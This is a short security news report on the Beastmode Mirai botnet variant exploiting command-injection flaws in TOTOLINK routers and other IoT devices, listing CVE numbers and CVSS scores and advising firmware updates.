Between February and March 2022, a variant of the Mirai botnet known as Beastmode was seen exploiting recently reported vulnerabilities in TOTOLINK routers in order to infect unpatched devices and potentially expand its reach.
As the FortiGuard Labs Research team has explained, the Beastmode (also known as B3astmode) Mirai-based DDoS operation has actively upgraded its arsenal of vulnerabilities to target. Just within a month, five more vulnerabilities have been uploaded to the database, including three that targeted many different TOTOLINK router types, according to the researchers.
Here is a list of the vulnerabilities that have been exploited in TOTOLINK routers:
- CVE-2022-26210 (CVSS score: 9.8) – An arbitrary code execution vulnerability that might be exploited to get access to a system’s configuration data.
- CVE-2022-26186 (CVSS score: 9.8) – A command injection vulnerability affecting the TOTOLINK N600R and A7100RU routers.
- CVE-2022-25075 to CVE-2022-25084 (CVSS scores: 9.8) – A command injection vulnerability affecting a large number of TOTOLINK routers, which might result in code execution.
Aside from brute-forcing credentials, Beastmode is also targeting flaws in TP-Link Tapo C200 IP cameras (CVE-2021-4045, CVSS score: 9.8), Huawei HG532 routers (CVE-2017-17215, CVSS score: 8.8), video surveillance solutions from NUUO and Netgear (CVE-2016-5674, CVSS score: 9.8), and D-Link products (CVE-2021-45382, CVSS score: 9.8).
Despite the fact that they affect a wide range of products, these vulnerabilities are all similar in that they allow threat actors to insert commands that will be executed following successful exploitation. In most cases, this entails utilizing the wget command to obtain shell scripts, which are then used to infect the device with Beastmode. Furthermore, various attacks result in somewhat different shell scripts.
Users are urgently advised to upgrade their devices’ firmware to the most recent version in order to avoid their devices being taken over by the botnet if they are impacted.
Although the original Mirai author was arrested in 2018, the latest attack campaign demonstrates how threat actors, such as those behind the Beastmode, continue to rapidly incorporate newly published exploit code into their campaigns to infect unpatched devices with the Mirai malware, the researchers explained.